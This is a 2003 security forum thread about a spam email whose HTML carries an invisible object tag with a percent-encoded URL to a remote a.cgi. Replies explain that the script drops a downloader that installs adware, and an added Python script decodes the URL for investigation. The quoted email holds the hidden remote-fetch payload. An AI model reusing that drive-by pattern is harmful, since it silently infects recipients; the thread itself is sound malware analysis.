Weird mail trying to get "a.cgi", any ideas?

Discussion in 'Computer Security' started by Maxime Ducharme, Sep 3, 2003.

  1. Hi,
    I received a suspicious email which seems to be an exploit
    of OE to infect people with a trojan or something like that.


    Here's how the email source looks (I removed SMTP IPs & received
    headers):

    =================== BEGIN SOURCE =================
    Message-ID: <[email protected]>
    From: "Lorna Roach" <>
    Reply-To: "Lorna Roach" <>
    To: <>, <>
    Subject: Hey
    Date: Wed, 03 Sep 03 22:41:51 GMT
    X-Mailer: AOL 7.0 for Windows US sub 118
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
    boundary="AF3E6...967056.7.08E03F7"
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Return-Path:


    --AF3E6...967056.7.08E03F7
    Content-Type: text/html;
    Content-Transfer-Encoding: quoted-printable

    <head>
    <div style=3D"display.none"><object data=3D"http://63.246.=
    %3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
    </head>
    <body>
    <p>Hey,</p>
    <p>How have you been?&nbsp; What have you been doing lately?</p>
    <p>Ive just been at home doing nothing :( bored at uni etc.</p>
    <p>Anyway's lets catch up soon,</p>
    <p>Luv,<br>You know who ;)</p>
    <p>&nbsp;</p>
    </body>
    </html>

    --AF3E6...967056.7.08E03F7--
    =================== END SOURCE =================


    This code tries to download this file :

    http://63.246.130.201/cgi-bin/a.cgi

    This host doesn't answer my pings and its TCP port 80 is stealthed.

    I didn't find anything on Google yet.

    Does someone recognize a virus in this, or am I targeted by someone?

    I do not like the fact that the email is targeted at 2 specific addresses
    of our organisation.

    Thanks for any reply
     
    Maxime Ducharme, Sep 3, 2003
    #1

  2. I saw my first of these last night and have had a couple more reports
    this morning...
    Close, yes...
    If you would not mind, I'd like to know the originating IP (or mail server).
    If you'd rather not post it publicly, please send it to me via Email.

    "URL escaped" encoding of a URL to a file called a.cgi which is a VBScript that
    drops a small .EXE (named drg.exe) and runs it. drg.exe is a "downloader" that
    pulls down a copy of the SurferBar IE toolbar and registers it via regsvr32.

    In turn the toolbar drops another .EXE (winsvr32.exe) into "c:\program files"
    (that path is hard-coded) and runs it. This .EXE is a "guardian" that runs a
    10-second sleep loop making sure that its own auto-start and two of SurferBar's
    registry configuration settings are present. The SurferBar toolbar also makes
    a large number of (pretty tastelessly named) shortcuts in your Start menu and
    in the "Programs" sub-menu thereunder...
    Yep -- that's what the above encoded URL decodes to...
    Yes -- it does seem rather dead now, but last night I could d/l that file and
    the SurferBar toolbar .DLL the downloader is programmed to grab. The main
    surferbar.com site (63.246.130.200) was pretty sad -- all the links were to
    some other site (kanoodle.com ??) and were dead, much as www.surferbar.com
    seems to be now... (Hopefully this means the hosting company has closed
    surferbar.com down...)
    Try Google Groups and search for "surferbar". There were a couple of dozen hits
    going back 2 or 3 days last night.
    AFAICT, it is not viral, but this "seed" Email seems to have been quite widely
    spammed.
     
    Nick FitzGerald, Sep 4, 2003
    #2
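Nick's "URL escaped" encoding worked through as an added example (not code from the thread or from anyone in it): the script below parses a constructed copy of the message above, undoes the quoted-printable encoding (including the `=` soft line break that splits the URL across two lines), percent-decodes the `<object data=...>` value and notes that the enclosing div was styled invisible, which gives an analyst the real host to search for in proxy and firewall logs. `CONSTRUCTED-BOUNDARY` is a placeholder for the elided boundary string, and the headers are cut down to what the parser needs.

```python
import re
from email import message_from_string
from urllib.parse import unquote, urlsplit

# Constructed sample: the HTML part of the message quoted in the thread, with a
# placeholder boundary (the real one is elided on the page) and minimal headers.
SAMPLE_MAIL = """\
From: "Lorna Roach" <>
Subject: Hey
Content-Type: multipart/alternative; boundary="CONSTRUCTED-BOUNDARY"

--CONSTRUCTED-BOUNDARY
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<head>
<div style=3D"display.none"><object data=3D"http://63.246.=
%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
</head>
<body><p>Hey,</p></body></html>

--CONSTRUCTED-BOUNDARY--
"""

OBJECT_DATA = re.compile(r'<object\b[^>]*\bdata\s*=\s*"([^"]*)"', re.IGNORECASE)
HIDDEN_STYLE = re.compile(r'style\s*=\s*"[^"]*display\W*none', re.IGNORECASE)

def html_parts(raw_mail):
    """Yield each text/html part with its transfer encoding (QP here) undone."""
    msg = message_from_string(raw_mail)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_payload(decode=True).decode("latin-1")

def extract_object_urls(raw_mail):
    """Return (decoded_url, hidden) for every <object data=...> in the mail's HTML."""
    found = []
    for html in html_parts(raw_mail):
        for m in OBJECT_DATA.finditer(html):
            # Undo the %XX escaping so the real host and path become readable.
            url = unquote(m.group(1))
            # Was the enclosing element styled invisible? (sample has the typo "display.none")
            hidden = bool(HIDDEN_STYLE.search(html[max(0, m.start() - 200):m.start()]))
            found.append((url, hidden))
    return found

def hosts_to_investigate(raw_mail):
    """Hosts referenced by embedded objects, ready for log searches and blocklists."""
    return sorted({urlsplit(u).hostname for u, _ in extract_object_urls(raw_mail)})
```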

  3. Maxime Ducharme

    Elson Mat

    Elson Mat, Sep 4, 2003
    #3
  4. Maxime Ducharme

    Lord Shaolin

    Lord Shaolin, Sep 4, 2003
    #4
  5. Thanks Nick, Elson & Lord for your answers
     
    Maxime Ducharme, Sep 4, 2003
    #5
